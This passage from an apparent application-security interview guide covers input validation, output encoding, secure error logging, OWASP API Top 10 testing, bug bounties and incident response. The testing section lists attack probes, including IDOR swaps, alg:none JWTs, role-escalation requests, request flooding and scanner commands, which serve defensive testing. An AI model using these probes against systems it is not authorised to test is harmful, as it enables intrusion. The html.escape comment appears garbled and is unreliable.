# Reachability: is the vulnerable code path actually reachable?
# Confidence: is this definitely a bug or a false positive?

3What is input validation and output encoding? Where do these defenses apply?

# Input validation: verify data matches expected format BEFORE processing
# Whitelist approach (preferred): only accept known-good values
# Blacklist approach (weaker): try to block known-bad values (attackers find bypasses)

from pydantic import BaseModel, validator, constr, confloat
import re

class PaymentRequest(BaseModel):
    amount: confloat(gt=0, le=10000)       # must be positive, max $10,000
    currency: constr(regex=r'^[A-Z]{3}$')  # exactly 3 uppercase letters
    recipient_id: constr(regex=r'^\d+$')    # digits only

    @validator('recipient_id')
    def validate_recipient(cls, v):
        if not db.user_exists(int(v)):
            raise ValueError("Invalid recipient")
        return v

# Validate at the earliest entry point, but ALSO validate at each layer:
# API layer: format, type, range
# Business logic: semantic validity (can user send money? sufficient balance?)
# Database: constraints enforce data integrity at the lowest level

# Output encoding: transform data to be safe in its target context
import html
# HTML context: encode HTML special characters
safe_html = html.escape(user_comment)       # < → <, > → >, & → &

# SQL: never encode — use parameterized queries instead
# JavaScript: JSON.stringify() when embedding in JS
# URL: urllib.parse.quote(value)
# Shell: use subprocess list syntax, never format into shell strings

4How do you handle error handling and logging securely? What information should you never expose?

# Never expose to users:
# - Stack traces (reveals technology, file paths, internal structure)
# - Database error messages (SQLi enumeration)
# - Internal IP addresses / hostnames
# - Software versions in error messages
# - User enumeration: "This email is not registered" vs "Invalid credentials"

# Secure error handling:
@app.exception_handler(Exception)
async def global_exception_handler(request, exc):
    trace_id = request.state.trace_id
    logger.error("Unhandled error", exc_info=exc, extra={"trace_id": trace_id})
    return JSONResponse(
        status_code=500,
        content={"error": "Internal server error", "trace_id": trace_id}
        # trace_id lets support look up the real error in logs
        # users get generic error, no internal details
    )

# What to log (for your systems):
# All authentication events with full context
# All authorization failures (who tried to access what)
# All API errors with input parameters (sanitized)
# Performance metrics and business events

# What NOT to log:
# Passwords (obviously)
# Full credit card numbers, CVV
# SSNs, passport numbers
# OAuth tokens, API keys (log last 4 chars only: sk_...abc)
# PII that's not needed for debugging

# Log sanitization:
def sanitize_for_log(data):
    if "password" in data: data["password"] = "[REDACTED]"
    if "card_number" in data: data["card_number"] = f"****{data['card_number'][-4:]}"
    if "token" in data: data["token"] = f"...{data['token'][-6:]}"
    return data

5What is security testing for APIs? How do you test for OWASP API Security Top 10?

# OWASP API Security Top 10 (2023) — key tests:

# API1 - Broken Object Level Authorization (BOLA/IDOR):
# Test: create two users A and B, use A's token with B's resource IDs
# GET /api/orders/12345 with user B's JWT → should get 404, not order 12345

# API2 - Broken Authentication:
# Test: expired tokens still accepted? Brute force possible?
# Test: JWT with alg:none accepted?

# API3 - Broken Object Property Level Authorization:
# Test: can user update fields they shouldn't (role, is_admin)?
# PUT /api/users/123 {"role": "admin"} → server should ignore role field

# API4 - Unrestricted Resource Consumption:
# Test: no rate limiting → send 10,000 requests per second
# Test: upload huge files → no size limit
# Test: request 1,000,000 records → no pagination limit

# API5 - Broken Function Level Authorization:
# Test: call admin endpoints with regular user token
# GET /api/admin/users → should get 403, not user list

# API8 - Security Misconfiguration:
# Test: default credentials, debug endpoints exposed, CORS *
# Test: HTTP methods not restricted (DELETE on read-only endpoint)

# Automated API testing tools:
# OWASP ZAP API scan: zap-api-scan.py -t openapi.yaml -f openapi
# Burp Suite: active scan against API
# Nuclei: nuclei -t /nuclei-templates/http/ -u https://api.example.com
# Custom scripts: iterate over all resource IDs, test cross-user access

6What is a bug bounty program and responsible disclosure? How should companies handle vulnerability reports?

Responsible disclosure (coordinated disclosure): A security researcher finds a vulnerability, reports it privately to the vendor, and gives them reasonable time (usually 90 days) to fix it before public disclosure. The 90-day standard was popularized by Google Project Zero.

Bug bounty program: Companies invite security researchers to find and report vulnerabilities in exchange for monetary rewards. Platforms: HackerOne, Bugcrowd, Intigriti. Scope defines what's in bounds (which assets, which vulnerability types).

# Security.txt (RFC 9116) — machine-readable vulnerability disclosure policy:
# https://example.com/.well-known/security.txt
Contact: security@example.com
Contact: https://hackerone.com/example-company
Expires: 2025-12-31T23:59:59Z
Encryption: https://example.com/pgp-key.asc
Policy: https://example.com/security/policy

# Vulnerability response SLAs (reasonable targets):
# Critical (RCE, auth bypass): acknowledge 24h, patch deployed 7 days
# High (IDOR, SQLi, XSS):     acknowledge 48h, patch deployed 30 days
# Medium:                      acknowledge 5 days, patch deployed 90 days
# Low:                         acknowledge 14 days, patch at next release

# Response process:
# 1. Acknowledge receipt (within 24-48h)
# 2. Validate the vulnerability
# 3. Assess severity and business impact
# 4. Develop and test fix
# 5. Deploy fix
# 6. Notify reporter, pay bounty
# 7. Issue CVE if applicable
# 8. Write post-mortem to prevent similar issues

7What is an incident response plan? What are the phases and key considerations?

An incident response (IR) plan defines the procedures for detecting, containing, and recovering from a security incident. Having a plan before an incident is essential — you can't think clearly when you're under attack.

NIST IR phases:

Preparation: IR plan, playbooks, tools, contact lists, tabletop exercises — before any incident
Detection & Analysis: Identify the incident, scope it, determine severity. Preserve evidence (logs, memory dumps) before containment
Containment: Stop the bleeding without destroying evidence. Short-term (isolate affected systems) and long-term (patch/harden)
Eradication: Remove the threat actor — malware, backdoors, compromised credentials
Recovery: Restore systems from clean backups, verify no persistence remains, gradually restore service
Post-Incident Activity: Root cause analysis, lessons learned, update defenses, update IR plan

# Key decisions during an incident:
# 1. Notify or contain first?
#    Preserve evidence, notify legal/privacy team early (breach notification laws)
#    GDPR: notify supervisory authority within 72 hours of becoming aware

# 2. Communicate externally?
#    Legal and PR involved early — don't say anything publicly that could be wrong
#    Breach notification required: GDPR, CCPA, HIPAA, state laws

# 3. Forensic preservation:
#    Don't wipe/reimage before collecting forensic image
#    Memory dump before reboot (volatile evidence)
#    Network capture, log preservation

# Credential compromise response checklist:
# □ Revoke all tokens/sessions for affected accounts
# □ Reset passwords + force MFA re-enrollment
# □ Rotate all secrets that may have been exposed
# □ Audit access logs for what data was accessed
# □ Notify affected users per applicable laws